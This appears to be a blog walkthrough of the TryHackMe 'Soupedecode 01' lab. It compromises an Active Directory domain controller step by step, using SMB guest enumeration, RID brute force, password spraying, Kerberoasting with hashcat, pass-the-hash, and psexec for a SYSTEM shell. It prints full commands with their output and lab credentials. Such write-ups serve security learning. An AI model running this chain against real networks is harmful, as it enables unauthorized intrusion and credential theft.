Introduction
Soupedecode is an Active Directory penetration testing room on TryHackMe. It challenges players to exploit Kerberos, SMB, password spraying, and Pass-the-Hash to gain domain controller access.
🔗 TryHackMe Soupedecode 01
Initial Enumeration
I began with an Nmap scan to identify open services and potential attack surfaces.
$ nmap -sV -sC -Pn 10.201.91.100
The scan revealed multiple services commonly associated with a Windows Domain Controller:
- DNS is open on port
53 - Kerberos is open on port
88 - LDAP is open on ports
389 & 3268 - SMB is open on port
445 - RDP is open on port
3389
Notably, the system exposed the domain name: SOUPEDECODE.LOCAL.
SMB Share Enumeration
With SMB (445/tcp) open, my next step was to check if the guest user had access to any shares. I ran CrackMapExec with an empty password:
crackmapexec smb 10.201.91.100 -u 'guest' -p '' --sharesSMB 10.201.91.100 445 DC01 [*] Windows 10.0 Build 20348 x64 (name:DC01) (domain:SOUPEDECODE.LOCAL) (signing:True) (SMBv1:False)
SMB 10.201.91.100 445 DC01 [+] SOUPEDECODE.LOCAL\guest:
SMB 10.201.91.100 445 DC01 [*] Enumerated shares
SMB 10.201.91.100 445 DC01 Share Permissions Remark
SMB 10.201.91.100 445 DC01 ----- ----------- ------
SMB 10.201.91.100 445 DC01 ADMIN$ Remote Admin
SMB 10.201.91.100 445 DC01 backup
SMB 10.201.91.100 445 DC01 C$ Default share
SMB 10.201.91.100 445 DC01 IPC$ READ Remote IPC
SMB 10.201.91.100 445 DC01 NETLOGON Logon server share
SMB 10.201.91.100 445 DC01 SYSVOL Logon server share
SMB 10.201.91.100 445 DC01 UsersThe results showed that authentication as guest was possible, and I could enumerate available shares:
- IPC$ → Read access (Remote IPC)
- ADMIN$, C$ → Default administrative shares
- NETLOGON & SYSVOL → Standard AD logon shares
- Users → Standard user profiles
- Backup → A non-standard share, though not accessible to the guest account
This immediately stood out because unusual shares (like backup) often hide sensitive information such as credentials or configuration files.
Attempting LDAP Enumeration
After identifying LDAP services (389/tcp and 3268/tcp), I attempted to enumerate users with CrackMapExec:
crackmapexec ldap 10.201.91.100 -u "guest" -p "" --usersSMB 10.201.91.100 445 DC01 [*] Windows 10.0 Build 20348 x64 (name:DC01) (domain:SOUPEDECODE.LOCAL) (signing:True) (SMBv1:False)
LDAP 10.201.91.100 445 DC01 [-] SOUPEDECODE.LOCAL\guest: Error connecting to the domain, are you sure LDAP service is running on the target?
Error: [Errno Connection error (DC01.SOUPEDECODE.LOCAL:389)] [Errno -3] Temporary failure in name resolutionUnfortunately, the query failed with a temporary name resolution error, suggesting the domain controller requires proper DNS resolution (pointing to DC01.SOUPEDECODE.LOCAL) before LDAP enumeration will succeed.
RID Brute Force User Enumeration
Since LDAP failed, I switched to RID brute forcing with CrackMapExec to enumerate valid users and groups:
crackmapexec smb 10.201.91.100 -u 'guest' -p '' --rid-bruteSMB 10.201.91.100 445 DC01 [*] Windows 10.0 Build 20348 x64 (name:DC01) (domain:SOUPEDECODE.LOCAL) (signing:True) (SMBv1:False)
SMB 10.201.91.100 445 DC01 [+] SOUPEDECODE.LOCAL\guest:
SMB 10.201.91.100 445 DC01 498: SOUPEDECODE\Enterprise Read-only Domain Controllers (SidTypeGroup)
SMB 10.201.91.100 445 DC01 500: SOUPEDECODE\Administrator (SidTypeUser)
SMB 10.201.91.100 445 DC01 501: SOUPEDECODE\Guest (SidTypeUser)
SMB 10.201.91.100 445 DC01 502: SOUPEDECODE\krbtgt (SidTypeUser)
SMB 10.201.91.100 445 DC01 512: SOUPEDECODE\Domain Admins (SidTypeGroup)
SMB 10.201.91.100 445 DC01 513: SOUPEDECODE\Domain Users (SidTypeGroup)
SMB 10.201.91.100 445 DC01 514: SOUPEDECODE\Domain Guests (SidTypeGroup)This method was successful, and it returned a large list of domain users and groups.
Exporting Users to a File
To handle the volume of results, I used awk to extract usernames into a dedicated wordlist:
crackmapexec smb 10.201.91.100 -u 'guest' -p '' --rid-brute | awk '{split($6,a,"\\"); print a[2]}' > users.txtThis created a users.txt file containing all the enumerated usernames for further testing.
Checking for Weak Credentials
Next, I checked if any users had their username set as the password A common misconfiguration. CrackMapExec makes this easy:
crackmapexec smb 10.201.91.100 -u users.txt -p users.txt --no-bruteforce --continue-on-successThis command tests username=password logins, and I found at least one valid account using this weak setup.
This quickly revealed valid credentials:
[+] SOUPEDECODE.LOCAL\ybob317 : ybob317Enumerating SMB Shares with Valid Credentials
With the discovered credentials, I enumerated accessible SMB shares:
crackmapexec smb 10.201.91.100 -u 'ybob317' -p 'ybob317' --sharesOutput:
SMB 10.201.91.100 445 DC01 [*] Windows 10.0 Build 20348 x64 (domain:SOUPEDECODE.LOCAL)
SMB 10.201.91.100 445 DC01 [+] SOUPEDECODE.LOCAL\ybob317:ybob317
SMB 10.201.91.100 445 DC01 [*] Enumerated shares
SMB 10.201.91.100 445 DC01 Share Permissions Remark
SMB 10.201.91.100 445 DC01 ----- ----------- ------
SMB 10.201.91.100 445 DC01 ADMIN$
SMB 10.201.91.100 445 DC01 backup
SMB 10.201.91.100 445 DC01 C$
SMB 10.201.91.100 445 DC01 IPC$ READ
SMB 10.201.91.100 445 DC01 NETLOGON READ
SMB 10.201.91.100 445 DC01 SYSVOL READ
SMB 10.201.91.100 445 DC01 Users READThe Users share was readable, which is usually where user directories and potential flags are stored.
Accessing the Users Share with Impacket
Since my original VM expired, I spun up another machine with a new IP and used Impacket’s SMB client to connect:
python3 examples/smbclient.py 10.201.1.205/ybob317:[email protected]After successful login, I listed available shares:
Press enter or click to view image in full size
I mounted the Users share and listed its contents:
Navigating to the User Directory
Press enter or click to view image in full size
User Flag
The user flag is typically located in the Desktop directory. I navigated there to retrieve it:
Enumerating SPNs for Kerberoasting
SPNs identify services in Active Directory. Misconfigured service accounts let us request Kerberos tickets and extract offline-crackable hashes A technique called Kerberoasting.
I ran Impacket’s GetUserSPNs.py with my valid credentials:
python3 examples/GetUserSPNs.py SOUPEDECODE.LOCAL/ybob317:ybob317 -dc-ip 10.201.1.205 -request -output hash.txtCracking Kerberoasted Hashes
With the SPN hashes saved in hash.txt, I moved on to cracking them using Hashcat with the rockyou.txt wordlist:
hashcat hash.txt wordlists/rockyou.txt --showHashcat auto-detected the format as Kerberos 5 TGS-REP (mode 13100) and successfully cracked one of the hashes:
$krb5tgs$23$*file_svc$SOUPEDECODE.LOCAL/file_svc*...
Password123!!This revealed valid credentials:
SOUPEDECODE.LOCAL\file_svc : Password123!!Accessing the Backup Share
Next, I tested these credentials against SMB shares:
crackmapexec smb 10.201.1.205 -u "file_svc" -p 'Password123!!' --sharesThe result confirmed that file_svc had read access to the backup share:
Share Permissions
----- -----------
backup READLooting the Backup Share
I connected to the share using Impacket’s smbclient.py:
python3 examples/smbclient.py 10.201.1.205/file_svc:'Password123!!'@10.201.1.205Once inside, I navigated to the backup share and found a single interesting file:
Press enter or click to view image in full size
I downloaded it:
get backup_extract.txtOpening this file revealed a large dump of hashes, which will be the next target for cracking and potential privilege escalation.
Cracking Backup Hashes → Gaining Access
With the dumped hashes from backup_extract.txt, I prepared two wordlists: one with usernames and another with NTLM hashes.
cat backup_extract.txt | awk -F\: '{ print $4}' > hashes.txt
cat backup_extract.txt | awk -F\: '{ print $1}' > users_hashes.txtNext, I used CrackMapExec to test username–hash pairs across SMB:
crackmapexec smb 10.201.1.205 -u users_hashes.txt -H hashes.txt --no-bruteforceThe output showed several login failures, but one stood out:
$ crackmapexec smb 10.201.1.205 -u users_hashes.txt -H hashes.txt --no-bruteforce
SMB 10.201.1.205 445 DC01 [*] Windows 10.0 Build 20348 x64 (name:DC01) (domain:SOUPEDECODE.LOCAL) (signing:True) (SMBv1:False)
SMB 10.201.1.205 445 DC01 [-] SOUPEDECODE.LOCAL\WebServer$:c47b45f5d4df5a494bd19f13e14f7902 STATUS_LOGON_FAILURE
SMB 10.201.1.205 445 DC01 [-] SOUPEDECODE.LOCAL\DatabaseServer$:406b424c7b483a42458bf6f545c936f7 STATUS_LOGON_FAILURE
SMB 10.201.1.205 445 DC01 [-] SOUPEDECODE.LOCAL\CitrixServer$:48fc7eca9af236d7849273990f6c5117 STATUS_LOGON_FAILURE
SMB 10.201.1.205 445 DC01 [+] SOUPEDECODE.LOCAL\FileServer$:e41da7e79a4c76dbd9cf79d1cb325559 (Pwn3d!)Gaining Remote Access with Impacket PsExec
Since I already had the NTLM hash of a privileged account, the next step was to turn it into a remote shell. Impacket’s psexec.py makes this straightforward by authenticating with hashes instead of plaintext credentials.
python3 impacket/examples/psexec.py 'soupedecode.local/FileServer$'@10.201.1.205 \
-hashes 'aad3b435b51404eeaad3b435b51404ee:e41da7e79a4c76dbd9cf79d1cb325559'The tool uploaded a service binary, executed it, and dropped me directly into a SYSTEM-level shell on the domain controller:
Press enter or click to view image in full size
Root flag.txt
cd C:\Users\Administrator\Desktop
type root.txtDomain compromise achieved!
If you found this TryHackMe Soupedecode 01 walkthrough useful, make sure to bookmark it and share it with fellow learners in cybersecurity.
⭐For the complete flags and full step-by-step guide, check out my write-up on GitHub: Soupedecode 01 Walkthrough.